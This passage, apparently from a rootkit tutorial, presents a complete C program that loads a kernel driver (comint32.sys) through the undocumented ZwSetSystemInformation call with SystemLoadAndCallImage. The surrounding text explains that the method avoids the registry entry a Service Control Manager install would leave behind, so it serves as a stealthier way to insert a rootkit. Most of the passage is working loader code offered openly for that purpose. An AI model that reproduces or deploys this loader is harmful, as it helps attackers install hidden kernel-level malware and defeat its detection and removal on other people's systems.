Rootkits installed with the Service Control Manager, like Ghost, leave a registry entry that can be easily removed. To prevent this type of installation vulnerability, a startup executable program can be used to insert a rootkit using ZwSetSystemInformation with SystemLoadAndCallImage instead of using the Service Control Manager. Here’s the code:
#include <windows.h> #include <stdio.h> #define SystemLoadAndCallImage 38 typedef long NTSTATUS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; VOID (_stdcall *RtlInitUnicodeString)( IN OUT UNICODE_STRING* DestinationString, IN PCWSTR SourceString ); NTSTATUS (_stdcall *ZwSetSystemInformation)( IN DWORD SystemInformationClass, IN OUT PVOID SystemInformation, IN LONG SystemInformationLength ); typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE { UNICODE_STRING ModuleName; } SYSTEM_LOAD_AND_CALL_IMAGE; void main(void) { NTSTATUS status; SYSTEM_LOAD_AND_CALL_IMAGE MyDeviceDriver; WCHAR imagepath[] = L"\\??\\C:\\comint32.sys"; RtlInitUnicodeString = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString"); ZwSetSystemInformation = (void*)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation"); if( RtlInitUnicodeString && ZwSetSystemInformation ) { RtlInitUnicodeString( &( MyDeviceDriver.ModuleName), imagepath ); status = ZwSetSystemInformation(SystemLoadAndCallImage, &MyDeviceDriver, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)); if( status >= 0 ) { printf( "MyDeviceDriver loaded!\n"); return; } } printf( "MyDeviceDriver was not loaded!\n"); }